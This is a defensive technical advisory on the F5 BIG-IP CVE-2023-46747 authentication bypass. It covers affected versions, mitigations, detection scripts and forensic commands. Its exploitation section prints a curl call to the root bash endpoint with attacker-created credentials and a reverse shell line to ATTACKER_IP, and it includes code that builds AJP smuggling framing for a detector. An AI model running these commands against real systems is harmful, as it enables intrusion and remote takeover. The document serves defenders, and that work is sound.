Description
Undisclosed requests may bypass configuration utility authentication, allowing an attacker with network access to the BIG-IP system through the management port and/or self IP addresses to execute arbitrary system commands. Note: Software versions which have reached End of Technical Support (EoTS) are not evaluated
EPSS Score:
94%
Comprehensive Technical Analysis of EUVD-2023-50916 (CVE-2023-46747)
F5 BIG-IP Authentication Bypass & Remote Command Execution Vulnerability
1. Vulnerability Assessment & Severity Evaluation
Overview
EUVD-2023-50916 (CVE-2023-46747) is a critical authentication bypass in the F5 BIG-IP Configuration utility (TMUI). An unauthenticated attacker who can reach the management port, or a self IP on which the Configuration utility is exposed, can smuggle a request past the Apache front end to the Tomcat back end over AJP (Apache JServ Protocol), obtain an authenticated TMUI context, and from there execute arbitrary system commands as root. F5 tracks the issue in advisory K000137353.
CVSS v3.1 Metrics & Severity
| Metric | Value | Explanation |
|---|---|---|
| Base Score | 9.8 (Critical) | High impact on confidentiality, integrity, and availability. |
| Attack Vector (AV) | Network (N) | Exploitable remotely without physical/logical access. |
| Attack Complexity (AC) | Low (L) | No specialized conditions required; straightforward exploitation. |
| Privileges Required (PR) | None (N) | No prior authentication needed. |
| User Interaction (UI) | None (N) | Exploitation does not require user action. |
| Scope (S) | Unchanged (U) | Impact is confined to the vulnerable component. |
| Confidentiality (C) | High (H) | Full system compromise possible. |
| Integrity (I) | High (H) | Arbitrary command execution allows data manipulation. |
| Availability (A) | High (H) | Attackers can disrupt services or take systems offline. |
EPSS & Exploitability
- EPSS Score: 94% (very high predicted probability of exploitation in the wild)
- Exploit Code Maturity: Functional (public PoC code and a Metasploit module exist; exploitation in the wild was confirmed within days of the October 2023 disclosure)
- Threat Intelligence: Listed in CISA's Known Exploited Vulnerabilities (KEV) catalog. The observed activity is a smuggled request that creates an administrator account, followed by command execution through iControl REST.
2. Potential Attack Vectors & Exploitation Methods
Root Cause Analysis
The Configuration utility is served by an Apache httpd front end that proxies TMUI requests to a Tomcat back end with mod_proxy_ajp. Apache and Tomcat disagree about where a chunked-encoded request body ends, so an attacker can place a raw AJP FORWARD_REQUEST packet inside the body of an ordinary-looking HTTPS request. Tomcat parses that packet as if Apache had produced it, and the request attributes that Apache normally sets only for an already-authenticated user are therefore under the attacker's control. The chain is:
- AJP Smuggling: embedding an attacker-built AJP packet in an HTTP body so that the Tomcat back end processes it as a separate, trusted request.
- Authentication Bypass: the smuggled packet carries attributes that TMUI accepts as proof of an authenticated administrative session, so authenticated TMUI pages become reachable without credentials (the public PoC targets the user-creation form and adds a new administrator).
- Command Execution: with valid administrator credentials the attacker calls the iControl REST endpoint /mgmt/tm/util/bash, which runs shell commands as root.
Exploitation Workflow
- Reconnaissance:
  - Attacker identifies exposed Configuration utility interfaces (HTTPS on the management port, by default 443/TCP or 8443/TCP on some cloud images, or any self IP whose port lockdown allows 443).
  - Uses tools like Shodan, Censys, or Nmap to discover instances; the /tmui/login.jsp login page is a reliable fingerprint.
- Request Smuggling:
  - Attacker sends an HTTPS POST to a TMUI path with a chunked body whose chunk contains a raw AJP packet.
  - Apache forwards the request; Tomcat consumes the smuggled packet as a second, trusted AJP request.
- Authentication Bypass & RCE:
  - The smuggled request executes in an authenticated TMUI context without credentials; the public PoC uses it to create a new administrative user.
  - With that account, the attacker calls /mgmt/tm/util/bash over iControl REST to execute arbitrary commands as root.
- Post-Exploitation:
  - Lateral Movement: Compromises internal networks via BIG-IP's trusted position.
  - Persistence: Installs backdoors, modifies configurations, or deploys malware.
  - Data Exfiltration: Steals sensitive data (e.g., SSL certificates and private keys, credentials, session tokens).
Publicly Available Exploits
- Public PoC – Praetorian, who reported the vulnerability, published a technical write-up; working proof-of-concept code circulated publicly (including on PacketStorm) within days.
- Metasploit Module – exploit/linux/http/f5_bigip_tmui_rce_cve_2023_46747 (the older exploit/linux/http/f5_bigip_tmui_rce module targets CVE-2020-5902, a different TMUI vulnerability).
- Active Exploitation – Confirmed by F5 and by CISA's KEV listing; observed activity consists of smuggled requests that create administrator accounts followed by iControl REST command execution.
3. Affected Systems & Software Versions
Vulnerable F5 BIG-IP Versions
| Major Version | Affected Versions | Fixed Versions |
|---|---|---|
| 17.x | 17.1.0 | 17.1.0.3 + ENG hotfix |
| 16.x | 16.1.0 – 16.1.4 | 16.1.4.1 + ENG hotfix |
| 15.x | 15.1.0 – 15.1.10 | 15.1.10.2 + ENG hotfix |
| 14.x | 14.1.0 – 14.1.5 | 14.1.5.6 + ENG hotfix |
| 13.x | 13.1.0 – 13.1.5 | 13.1.5.1 + ENG hotfix |
Note: F5's initial fix for each branch is the listed point release plus an engineering (ENG) hotfix named in K000137353; the point release on its own does not contain the fix. Later full releases that include the fix are equivalent.
Out-of-Scope (Not Evaluated)
- End-of-Technical-Support (EoTS) versions (e.g., 12.x, 11.x) were not evaluated by F5 and will not receive a fix; treat them as vulnerable and migrate.
- BIG-IQ, NGINX, and other F5 products are not affected.
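The following is an added example (not F5 tooling) that turns the table above into a check an operator can run over a device inventory. It parses the version strings printed by `tmsh show sys version`, compares them against the affected and fixed releases for CVE-2023-46747, and reports a device sitting exactly on a fixed point release separately, because the ENG hotfix still has to be verified there. The inventory lines are constructed placeholders.

```python
# Added example, not F5 tooling: classify a BIG-IP version string against
# the affected ranges and first fixed releases from K000137353 for
# CVE-2023-46747. Version strings are what `tmsh show sys version` prints
# (e.g. "16.1.3.2"). F5's initial fix for each branch was the point
# release plus an engineering (ENG) hotfix, so a device sitting exactly on
# the fixed point release is reported separately: verify the hotfix.
from typing import Dict, Iterable, Tuple

Version = Tuple[int, ...]

# (first affected release, first fixed point release) per branch
AFFECTED_RANGES = [
    ((17, 1, 0), (17, 1, 0, 3)),
    ((16, 1, 0), (16, 1, 4, 1)),
    ((15, 1, 0), (15, 1, 10, 2)),
    ((14, 1, 0), (14, 1, 5, 6)),
    ((13, 1, 0), (13, 1, 5, 1)),
]
# Branches F5 lists as EoTS and therefore did not evaluate
EOTS_MAJORS = {11, 12}


def parse_version(text: str) -> Version:
    """'16.1.3.2' -> (16, 1, 3, 2); '17.1.0' -> (17, 1, 0, 0)."""
    parts = [int(p) for p in text.strip().split(".")]
    if not 3 <= len(parts) <= 4:
        raise ValueError(f"unexpected BIG-IP version format: {text!r}")
    while len(parts) < 4:
        parts.append(0)
    return tuple(parts)


def assess(text: str) -> str:
    """Return one of: vulnerable, fixed_verify_eng_hotfix, fixed,
    eots_not_evaluated, not_listed."""
    v = parse_version(text)
    if v[0] in EOTS_MAJORS:
        return "eots_not_evaluated"
    for first, fixed in AFFECTED_RANGES:
        if v[:2] != first[:2]:
            continue  # different branch
        if v == fixed:
            return "fixed_verify_eng_hotfix"
        if v > fixed:
            return "fixed"
        if v >= first + (0,):
            return "vulnerable"
    return "not_listed"


def report(lines: Iterable[str]) -> Dict[str, str]:
    """Summarise 'hostname version' inventory lines as {host: status}."""
    result = {}
    for line in lines:
        host, _, ver = line.partition(" ")
        result[host] = assess(ver)
    return result


if __name__ == "__main__":
    # Constructed inventory, not real devices
    inventory = ["lb-edge-01 16.1.3.2", "lb-edge-02 17.1.0.3",
                 "lb-dc-01 12.1.6", "lb-dc-02 17.1.1"]
    for host, status in report(inventory).items():
        print(f"{host}: {status}")
```

The comparison is done on four-field tuples so that "17.1.0" (vulnerable) and "17.1.0.3" (fixed point release) sort correctly; anything on a branch the advisory does not list is reported as not_listed rather than silently treated as safe.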
4. Recommended Mitigation Strategies
Immediate Actions (For Unpatched Systems)
- Apply Security Patches:
  - Upgrade to the fixed point release for your branch and install the accompanying ENG hotfix (see table above), or move to a later full release that already contains the fix.
  - F5's official advisory: K000137353.
- Workarounds (If Patching is Delayed):
  - Apply F5's mitigation script: K000137353 provides a shell script for BIG-IP 14.1.0 and later that adjusts the Apache-to-Tomcat proxy configuration to block the smuggling technique. No script is available for 13.x and earlier.
  - Restrict Management Access: limit the Configuration utility on the management port to trusted administrative networks with the httpd allow list (replace the addresses with your own; `allow none` shuts the utility off for everyone, including you):
```
tmsh modify /sys httpd allow replace-all-with { 10.10.0.0/24 192.0.2.10 }
tmsh save /sys config
```
  - Disable self-IP access to the Configuration utility: set port lockdown on every self IP to `allow-service none` or an explicit list without tcp:443 (note that Allow Default includes HTTPS 443 and SSH 22):
```
tmsh modify /net self <self-ip-name> allow-service none
tmsh save /sys config
```
  - Do not rely on `sys httpd auth-pam-validate-ip`: that setting only controls IP validation of session cookies, it neither disables the utility nor blocks this attack.
- Network-Level Protections:
  - Deploy WAF rules (F5 ASM/Advanced WAF or an upstream ModSecurity in front of the management interface) that reject TMUI requests carrying both Content-Length and Transfer-Encoding, or a chunked body containing the AJP magic bytes 0x12 0x34.
  - Segment BIG-IP management interfaces from untrusted networks; the management port should never be internet-reachable.
- Monitoring & Detection:
  - SIEM Alerts: alert on new local accounts (especially with the admin role) and on iControl REST calls to /mgmt/tm/util/bash from unexpected users or source addresses.
  - Endpoint Detection (EDR/XDR): detect post-exploitation activity (e.g., reverse shells, credential dumping, shells spawned by restjavad or httpd).
  - BIG-IP Logs: review /var/log/audit for account creation and tmsh activity, /var/log/restjavad-audit.0.log for iControl REST calls, and the Apache logs under /var/log/httpd/ for chunked POSTs to /tmui/ from untrusted sources. Note that the AJP channel itself is local to the device, so "AJP traffic" is not something you will see on the wire.
Long-Term Hardening
- Disable Unused Services: remove the Configuration utility and SSH from self IPs via port lockdown, and turn off SNMP or other management services that are not required.
- Enable Multi-Factor Authentication (MFA) for TMUI access.
- Regular Vulnerability Scanning: Use Nessus, Qualys, or OpenVAS to detect unpatched systems.
- Zero Trust Architecture: Implement micro-segmentation to limit lateral movement.
5. Impact on the European Cybersecurity Landscape
Threat Landscape in Europe
- Critical Infrastructure at Risk:
  - BIG-IP is widely deployed in European financial institutions, government agencies, and healthcare providers, usually at the network edge in front of the services those sectors depend on.
  - Successful exploitation could lead to large-scale personal-data breaches (GDPR) or service disruptions.
- Active Exploitation in the Wild:
  - Exploitation was confirmed within days of the October 2023 disclosure, and the CVE was added to CISA's Known Exploited Vulnerabilities catalog.
  - Internet-facing network and security appliances such as BIG-IP are a recurring initial-access vector in ENISA and CERT-EU threat reporting, so any exposed management interface should be assumed to have been scanned.
- Supply Chain Risks:
  - Many European MSPs and cloud providers use BIG-IP for load balancing, making them high-value targets.
  - Compromise of a single shared BIG-IP instance (and the certificates and credentials it holds) could cascade across multiple customer organizations.
Regulatory & Compliance Implications
- GDPR (Article 32): Failure to patch may result in fines up to €20M or 4% of global revenue.
- NIS2 Directive: Critical infrastructure operators must report incidents within 24 hours.
- DORA (Digital Operational Resilience Act): Financial entities must ensure third-party risk management (e.g., F5 vendors).
6. Technical Details for Security Professionals
Exploitation Deep Dive
AJP Smuggling Technique
- Front-End/Back-End Disagreement: Apache (mod_proxy_ajp) and Tomcat parse the boundaries of a chunked-encoded request differently, so bytes that Apache treats as request body are consumed by Tomcat as a new AJP packet. Because the AJP channel is local and normally written only by Apache, Tomcat trusts everything in that packet, including the attributes Apache would set for an authenticated user.
- Request Shape (sketch of the framing, not a working payload):
```http
POST /tmui/login.jsp HTTP/1.1
Host: vulnerable-bigip.example.com
Transfer-Encoding: chunked
Content-Type: application/x-www-form-urlencoded

<chunk size in hex>
\x12\x34 <2-byte length> \x02 ...    raw AJP13 FORWARD_REQUEST packet
0

```
- Bypass Mechanism: the smuggled FORWARD_REQUEST is processed as an authenticated TMUI request; the public PoC points it at the user-creation form to add an administrator account.
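As an added example (not the page's or F5's code, and not the exploit itself), the block below builds the framing the technique depends on, an AJP13 FORWARD_REQUEST packet carried inside a chunked HTTP body, and then runs a request-level detector of the kind a WAF or reverse proxy in front of the management interface could apply. The AJP packet built here carries no headers and no request attributes, so it only reproduces the framing a detector keys on; the host name and TMUI paths are placeholders.

```python
# Added example, not the page's or F5's code: AJP13 FORWARD_REQUEST framing
# inside a chunked HTTP body, plus a detector for that framing. The packet
# carries no request attributes, so it is not the exploit payload.
import struct
from typing import Dict, List, Optional, Tuple

AJP_MAGIC = b"\x12\x34"              # client -> container packet prefix
AJP_FORWARD_REQUEST = 0x02           # packet type code
AJP_METHODS = {2: "GET", 4: "POST"}  # subset of the AJP13 method table


def ajp_string(s: str) -> bytes:
    """AJP13 string: 2-byte big-endian length, bytes, NUL terminator."""
    raw = s.encode()
    return struct.pack(">H", len(raw)) + raw + b"\x00"


def build_forward_request(method_code: int, uri: str,
                          server_name: str = "localhost", port: int = 443) -> bytes:
    """Minimal AJP13 FORWARD_REQUEST with no headers and no attributes."""
    body = bytes([AJP_FORWARD_REQUEST, method_code])
    body += ajp_string("HTTP/1.1") + ajp_string(uri)
    body += ajp_string("127.0.0.1")             # remote_addr as Tomcat sees it
    body += ajp_string("") + ajp_string(server_name)
    body += struct.pack(">H", port) + b"\x01"   # server_port, is_ssl
    body += struct.pack(">H", 0)                # num_headers
    body += b"\xff"                             # attribute list terminator
    return AJP_MAGIC + struct.pack(">H", len(body)) + body


def chunked(payload: bytes) -> bytes:
    return f"{len(payload):x}\r\n".encode() + payload + b"\r\n0\r\n\r\n"


def build_smuggling_request(host: str, path: str, inner: bytes) -> bytes:
    """HTTP request whose chunked body carries a raw AJP packet."""
    head = (f"POST {path} HTTP/1.1\r\nHost: {host}\r\n"
            "Transfer-Encoding: chunked\r\n"
            "Content-Type: application/x-www-form-urlencoded\r\n\r\n")
    return head.encode() + chunked(inner)


def parse_http_request(raw: bytes) -> Tuple[str, Dict[str, str], bytes]:
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.split(b"\r\n")
    headers: Dict[str, str] = {}
    for line in lines[1:]:
        name, _, value = line.partition(b":")
        headers[name.strip().lower().decode()] = value.strip().decode()
    return lines[0].decode(), headers, body


def dechunk(body: bytes) -> bytes:
    out, pos = b"", 0
    while True:
        end = body.index(b"\r\n", pos)
        size = int(body[pos:end].split(b";")[0], 16)
        pos = end + 2
        if size == 0:
            return out
        out += body[pos:pos + size]
        pos += size + 2


def parse_ajp_forward(pkt: bytes) -> Optional[Tuple[str, str]]:
    """(method, req_uri) if pkt starts with a FORWARD_REQUEST, else None."""
    if len(pkt) < 6 or not pkt.startswith(AJP_MAGIC) or pkt[4] != AJP_FORWARD_REQUEST:
        return None
    method = AJP_METHODS.get(pkt[5], f"code{pkt[5]}")
    pos, fields = 6, []
    try:
        for _ in range(2):                       # protocol, req_uri
            (n,) = struct.unpack(">H", pkt[pos:pos + 2])
            fields.append(pkt[pos + 2:pos + 2 + n].decode(errors="replace"))
            pos += 2 + n + 1
    except struct.error:
        return None
    return method, fields[1]


def inspect_request(raw: bytes) -> List[str]:
    """Findings for one request; an empty list means nothing suspicious."""
    _, headers, body = parse_http_request(raw)
    findings = []
    if "transfer-encoding" in headers and "content-length" in headers:
        findings.append("both Transfer-Encoding and Content-Length present")
    payload = body
    if "chunked" in headers.get("transfer-encoding", "").lower():
        try:
            payload = dechunk(body)
        except (ValueError, IndexError):
            findings.append("malformed chunked body")
    idx = payload.find(AJP_MAGIC)
    if idx != -1:
        parsed = parse_ajp_forward(payload[idx:])
        if parsed:
            findings.append(f"smuggled AJP FORWARD_REQUEST: {parsed[0]} {parsed[1]}")
        else:
            findings.append("AJP magic bytes in request body")
    return findings


# Constructed sample traffic (placeholder host and paths), not captured data
BENIGN_LOGIN = (b"POST /tmui/login.jsp HTTP/1.1\r\nHost: bigip.example.internal\r\n"
                b"Content-Length: 23\r\n\r\nusername=admin&passwd=x")
SMUGGLED = build_smuggling_request(
    "bigip.example.internal", "/tmui/login.jsp",
    build_forward_request(2, "/tmui/some/authenticated/page.jsp"))

if __name__ == "__main__":
    for name, req in (("benign", BENIGN_LOGIN), ("smuggled", SMUGGLED)):
        print(name, inspect_request(req))
```

The detector dechunks the body itself rather than trusting the proxy to do so, because the whole point of the bug is that two parsers disagree about the body; it then looks for the AJP packet prefix and parses only the fixed fields (method, protocol, req_uri) needed to name what was smuggled.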
Post-Exploitation Command Execution
- Exploit Chain:
  - Smuggle an AJP request → authenticated TMUI context → create an administrator account with attacker-chosen credentials.
  - Use that account against iControl REST, which runs the command as root:
```shell
curl -sk -u 'NEWADMIN:NEWPASS' \
  -H 'Content-Type: application/json' \
  -X POST "https://<TARGET>/mgmt/tm/util/bash" \
  -d '{"command":"run","utilCmdArgs":"-c id"}'
```
  - Reverse Shell Example (passed as the utilCmdArgs command):
```shell
bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1
```
Detection & Forensics
Indicators of Compromise (IoCs)
| IoC Type | Example |
|---|---|
| Network | Chunked POSTs to /tmui/ paths (typically /tmui/login.jsp) whose body contains the AJP magic bytes 0x12 0x34; management-port access from unexpected sources |
| Logs | /var/log/audit entries creating local users or assigning the admin role that no administrator performed; /var/log/restjavad-audit.0.log entries for POST /mgmt/tm/util/bash |
| Accounts | Local users absent from your inventory (`tmsh list auth user`), often with short random names and the admin role |
| Processes | Suspicious bash, python, or curl processes spawned by restjavad or httpd; unexpected outbound connections |
| Files | Unauthorized modifications to /config/bigip.conf or /etc/passwd; new cron entries |
Forensic Analysis Steps
- Check for exploitation, unexpected accounts, and persistence:
```shell
# Attacker-created accounts: compare against your inventory
tmsh list auth user
grep -i 'auth user' /var/log/audit*
# Command execution via iControl REST
grep -i 'util/bash' /var/log/restjavad-audit*
# Smuggling attempts: POSTs to TMUI paths from untrusted sources
grep -i 'POST /tmui/' /var/log/httpd/httpd_access_log
# Local users outside the expected set
grep -v -e '^root:' -e '^admin:' /etc/passwd
# Persistence: cron entries and recently added executables
ls -la /etc/cron.d/ /var/spool/cron/
find / -xdev -type f -name '*.sh' -perm -111 -mtime -30 2>/dev/null
```
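The following is an added example (not F5 tooling) that automates the log review described under Monitoring & Detection in section 4 and in the forensic steps above. It triages the two artefacts the exploit chain leaves behind: an account creation in /var/log/audit that nobody on the team performed, and a /mgmt/tm/util/bash call in /var/log/restjavad-audit.0.log by an unknown user or from outside the admin network. The sample lines are constructed and only approximate the real log formats, which is why the patterns are kept loose; the known-account set and trusted admin network are assumptions to adapt.

```python
# Added example, not F5 tooling: triage BIG-IP log lines for the two
# artefacts of this exploit chain, an unexpected account creation in
# /var/log/audit and a /mgmt/tm/util/bash call in
# /var/log/restjavad-audit.0.log. Sample lines are constructed and only
# approximate the real formats. KNOWN_ACCOUNTS and TRUSTED_ADMIN_NETS are
# assumptions to replace with your own inventory.
import ipaddress
import json
import re
from typing import Dict, Iterable, List

KNOWN_ACCOUNTS = {"admin", "root", "svc-monitor"}            # assumed inventory
TRUSTED_ADMIN_NETS = [ipaddress.ip_network("10.10.0.0/24")]   # assumed

# Matches both tmsh-style "create auth user NAME" and mcpd-style
# "create { auth user { NAME" audit records.
USER_CREATE_RE = re.compile(r"create\s*\{?\s*auth user\s*\{?\s*([A-Za-z0-9_.-]+)", re.I)
REST_JSON_RE = re.compile(r"\{.*\}$")


def find_created_users(audit_lines: Iterable[str]) -> List[Dict[str, str]]:
    """Account creations for users outside the known set."""
    hits = []
    for line in audit_lines:
        m = USER_CREATE_RE.search(line)
        if m and m.group(1) not in KNOWN_ACCOUNTS:
            hits.append({"user": m.group(1), "line": line})
    return hits


def is_trusted(addr: str) -> bool:
    try:
        ip = ipaddress.ip_address(addr)
    except ValueError:
        return False
    return any(ip in net for net in TRUSTED_ADMIN_NETS)


def find_bash_calls(rest_lines: Iterable[str],
                    extra_suspect: Iterable[str] = ()) -> List[Dict[str, str]]:
    """util/bash calls by unknown or attacker-created users, or from outside the admin net."""
    suspects = set(extra_suspect)
    hits = []
    for line in rest_lines:
        m = REST_JSON_RE.search(line)
        if not m:
            continue
        try:
            rec = json.loads(m.group(0))
        except json.JSONDecodeError:
            continue
        if not rec.get("uri", "").endswith("/mgmt/tm/util/bash"):
            continue
        user, src = rec.get("user", ""), rec.get("from", "")
        if user in suspects or user not in KNOWN_ACCOUNTS or not is_trusted(src):
            hits.append({"user": user, "from": src, "line": line})
    return hits


def triage(audit_lines: Iterable[str], rest_lines: Iterable[str]) -> List[str]:
    """Human-readable findings; accounts created in audit logs are treated
    as suspects when they later show up running util/bash."""
    new_users = [h["user"] for h in find_created_users(audit_lines)]
    calls = find_bash_calls(rest_lines, extra_suspect=new_users)
    findings = [f"unexpected account created: {u}" for u in new_users]
    findings += [f"util/bash by {c['user']} from {c['from']}" for c in calls]
    return findings


# Constructed sample lines (approximate formats), not real logs
AUDIT_SAMPLE = [
    "Nov  1 10:02:11 bigip1 notice tmsh[2817]: 01420002:5: AUDIT - pid=2817 user=admin "
    "folder=/Common module=(tmos)# status=[Command OK] cmd_data=list sys version",
    "Nov  1 10:07:43 bigip1 notice mcpd[5310]: 01070417:5: AUDIT - client tmui, user admin - "
    "transaction #1234-2 - object 0 - create { auth user { k5v9rk { ... } } } [Status=Command OK]",
]
REST_SAMPLE = [
    '[I][2817][01 Nov 2023 10:09:02 UTC][ForwarderPassThroughWorker] {"user":"k5v9rk",'
    '"method":"POST","uri":"http://localhost:8100/mgmt/tm/util/bash","status":200,"from":"203.0.113.7"}',
    '[I][2817][01 Nov 2023 10:30:00 UTC][ForwarderPassThroughWorker] {"user":"admin",'
    '"method":"POST","uri":"http://localhost:8100/mgmt/tm/util/bash","status":200,"from":"10.10.0.5"}',
]

if __name__ == "__main__":
    for finding in triage(AUDIT_SAMPLE, REST_SAMPLE):
        print(finding)
```

A legitimate util/bash call by a known administrator from the admin network is deliberately not flagged, so the output stays actionable; run it with `triage(open('/var/log/audit').read().splitlines(), open('/var/log/restjavad-audit.0.log').read().splitlines())` on the device or on exported copies.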
Conclusion & Recommendations
Key Takeaways
- CVE-2023-46747 is a critical, actively exploited vulnerability with high impact on confidentiality, integrity, and availability.
- Exploitation is trivial (public PoCs available) and requires no authentication.
- European organizations are at high risk due to widespread BIG-IP usage in critical sectors.
Action Plan for Security Teams
- Patch Immediately: Apply F5’s fixes without delay.
- Isolate Management Interfaces: Restrict access to trusted IPs only.
- Monitor for Exploitation: Deploy SIEM alerts for smuggled TMUI requests, unexpected account creation, and iControl REST command execution.
- Conduct Forensic Analysis: Check for signs of compromise in logs.
- Review Compliance: Ensure alignment with GDPR, NIS2, and DORA.
Final Risk Assessment
| Factor | Risk Level | Justification |
|---|---|---|
| Exploitability | Critical | Public PoCs, low complexity |
| Impact | Critical | Full system compromise |
| Likelihood | High | Active exploitation observed |
| Mitigation Feasibility | High | Patches and workarounds available |
Recommendation: Treat this as a Tier-0 vulnerability and prioritize remediation within 24-48 hours to prevent catastrophic breaches.